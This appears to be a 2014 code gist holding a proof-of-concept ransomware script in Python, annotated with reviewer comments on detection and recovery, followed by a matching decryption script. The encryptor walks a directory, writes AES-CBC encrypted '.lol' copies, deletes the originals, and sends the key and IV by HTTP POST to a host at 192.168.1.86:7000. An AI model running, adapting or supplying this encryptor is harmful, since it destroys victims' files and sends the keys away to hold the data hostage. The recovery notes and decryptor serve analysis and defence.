@zmallen
Created February 23, 2014 16:48
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
import subprocess as sub
# Proof-of-concept file encryptor: for each file under a directory it writes an
# AES-CBC encrypted copy named "<file>.lol" and removes the original.
# NOTE(review): this listing lost its indentation when the page was extracted, so the
# nesting of the statements below is not visible; each comment describes the statement
# that follows it, and anything about nesting is marked as a presumption.
#
# Artifacts visible in this code that matter for detection and recovery:
#   * output files carry the ".lol" suffix and start with an unencrypted 8-byte
#     little-endian original-size field (struct format '<Q');
#   * the key and IV leave the host as hex form fields in a plain-HTTP POST to /submit;
#   * originals are deleted with os.remove(), i.e. unlinked, not overwritten.
class lolCrypt:
# Keeps the raw key and IV and builds one AES-CBC cipher object from them.
def __init__(self, key, iv):
self.key = key
self.iv = iv
# This is the only place a cipher object is created; encrypt_file() reuses it for
# every chunk of every file. PyCrypto CBC objects keep their chaining state between
# encrypt() calls, so presumably only the first file processed starts from self.iv
# and each later file continues from the previous file's last ciphertext block.
# For recovery this means the order in which files were processed matters.
self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)
# Encrypts in_filename into in_filename + '.lol', reading chunksize bytes at a time.
# Output layout: 8-byte '<Q' original size (cleartext), then the CBC ciphertext.
# There is no MAC or other integrity value in the output format.
def encrypt_file(self, in_filename, chunksize=64 * 1024):
out_filename = in_filename + '.lol'
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
# The original length is stored unencrypted so a decryptor can strip the padding.
outfile.write(struct.pack('<Q', filesize))
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
# A short chunk is padded with spaces up to the 16-byte AES block size.
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(self.cryptor.encrypt(chunk))
# Walks target_dir with os.walk and processes every file whose base name is not in
# white_list (the comparison is on the file name only, not the full path).
def walk(self, target_dir, white_list):
try:
for dirname, dirnames, filenames in os.walk(target_dir):
# Iterate the files of the current directory.
for filename in filenames:
try:
full_file = os.path.join(dirname, filename)
if filename not in white_list:
self.encrypt_file(full_file)
# Presumably nested under the whitelist check (indentation lost; confirm).
# os.remove() only unlinks the original, it does not overwrite its contents.
os.remove(full_file)
# Bare except: any per-file failure is skipped without being reported.
except:
continue
# Bare except: a failure of the walk itself is also discarded silently.
except:
pass
# Sends the key and IV, hex-encoded, as form fields in an HTTP POST to /submit on
# 192.168.1.86 port 7000. httplib.HTTPConnection is plain HTTP, so a packet capture
# of this request contains the values needed to decrypt the ".lol" files.
# No response is read and no error is handled in the visible code.
def drop(self):
conn = httplib.HTTPConnection('192.168.1.86', '7000')
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
params = urllib.urlencode({'key':self.key.encode('hex'), 'iv':self.iv.encode('hex')})
conn.request('POST', '/submit', params, headers)
# Entry point of the encrypt script: generates a key and IV, prints them, then
# processes one hard-coded directory chosen by platform.
# NOTE(review): indentation was lost in this listing; branch bodies are presumed to be
# the statements that follow each if/elif line.
def main():
# 16 random bytes each from os.urandom: a 128-bit AES key and a 16-byte CBC IV.
key = os.urandom(16)
iv = os.urandom(16)
aes = lolCrypt(key, iv)
# Key and IV are written to stdout in hex, so terminal or console logs of a run
# also hold the material the decrypt script asks for.
print 'key: %s\niv: %s' % (key.encode('hex'), iv.encode('hex'))
if _platform == "linux" or _platform == "linux2":
# linux
print 'linux'
# Base names that walk() leaves untouched on Linux.
linux_whitelist = ['cat', 'wall', 'echo', 'python', 'ifconfig', 'ls', 'python2.7', 'python2.6', 'bash', 'chmod']
# The key/IV POST happens before any file is touched.
aes.drop()
aes.walk("/root/wat", linux_whitelist)
elif _platform == "darwin":
# OS X
print 'darwin'
osx_whitelist = ["no.no"]
# No drop() call is visible in this branch: here the key and IV exist only in the
# stdout line printed above.
aes.walk("/Users/techy/git/crypto/wat", osx_whitelist)
elif _platform == "win32":
# Windows: only a message is printed, no files are processed.
print 'winders'
# Run main() only when the file is executed as a script.
if __name__ == '__main__':
main()
###### decrypt ###
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
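class lolCrypt:
    """Recovery tool for files written by the encrypt script above (".lol" files).

    Expected input layout, as produced by the encryptor's encrypt_file():
    an unencrypted 8-byte little-endian original size ('<Q'), followed by
    AES-CBC ciphertext whose last block may be space-padded.

    NOTE(review): one cipher object is created in __init__ and shared by every
    file. PyCrypto CBC objects keep chaining state between calls, so the first
    16-byte block of each file after the first presumably decrypts correctly
    only when files are visited in the same order the encryptor used; os.walk
    does not guarantee that. Verify the first block of recovered files.
    """

    def __init__(self, key, iv):
        """Store the raw key/IV bytes and build the shared AES-CBC object."""
        self.key = key
        self.iv = iv
        self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)

    def decrypt_file(self, in_filename, chunksize=24 * 1024):
        """Decrypt one ".lol" file next to itself and delete the ciphertext.

        The ciphertext is removed only after the plaintext has been written
        in full. If the header is short, the ciphertext is shorter than the
        recorded size, or any other error occurs, the ".lol" file is kept so
        the only copy of the data is not lost; a partial output file may
        remain and should be discarded.

        Args:
            in_filename: path of the encrypted file; must end in '.lol'.
            chunksize: read size in bytes; rounded up to a multiple of the
                16-byte AES block so every decrypt() call gets whole blocks.
        """
        if not in_filename.endswith('.lol'):
            print('uh ohs, no .lol in filename :D -> %s' % (in_filename))
            return
        out_filename = in_filename[0:-4]
        header_len = struct.calcsize('<Q')
        if chunksize > 0 and chunksize % 16 != 0:
            chunksize += 16 - chunksize % 16
        try:
            with open(in_filename, 'rb') as infile:
                header = infile.read(header_len)
                if len(header) != header_len:
                    raise ValueError('missing size header')
                origsize = struct.unpack('<Q', header)[0]
                written = 0
                with open(out_filename, 'wb') as outfile:
                    while True:
                        chunk = infile.read(chunksize)
                        if len(chunk) == 0:
                            break
                        plain = self.cryptor.decrypt(chunk)
                        outfile.write(plain)
                        written += len(plain)
                    # truncate() would silently zero-extend a short output, so a
                    # truncated ciphertext must be rejected before it is called.
                    if written < origsize:
                        raise ValueError('ciphertext shorter than recorded size')
                    # Drop the space padding added to the final block.
                    outfile.truncate(origsize)
            # Reached only when the plaintext was written completely.
            os.remove(in_filename)
        except Exception as err:
            # Report what failed and for which file; the ciphertext is kept.
            print('Error: %r while decrypting %s' % (err, in_filename))

    def walk(self, target_dir):
        """Call decrypt_file() on every file found under target_dir."""
        print('walkin')
        for dirname, dirnames, filenames in os.walk(target_dir):
            # filenames was listed before this directory is modified, so the
            # plaintext files created below are not revisited.
            for filename in filenames:
                full_file = os.path.join(dirname, filename)
                print('file %s' % full_file)
                self.decrypt_file(full_file)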
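def main():
    """Decrypt the ".lol" files under a hard-coded directory for this platform.

    The key and IV must be pasted in below as the hex strings printed by the
    encrypt script. That script generates 16 random bytes for each, so both
    values are 32 hex characters; anything else is rejected up front instead
    of failing inside the cipher constructor.
    """
    # fill out key and iv from other output here
    key = ''
    iv = ''
    if len(key) != 32 or len(iv) != 32:
        print('key and iv must each be 32 hex characters (16 bytes)')
        return
    aes = lolCrypt(key.decode('hex'), iv.decode('hex'))
    if _platform == 'linux' or _platform == 'linux2':
        # linux
        print('linux')
        # NOTE(review): the encrypt script walks "/root/wat" on Linux, not
        # "/wat"; confirm which directory actually holds the ".lol" files.
        aes.walk('/wat')
    elif _platform == "darwin":
        # OS X
        print('darwin')
        aes.walk('/Users/techy/git/crypto/wat')


if __name__ == '__main__':
    main()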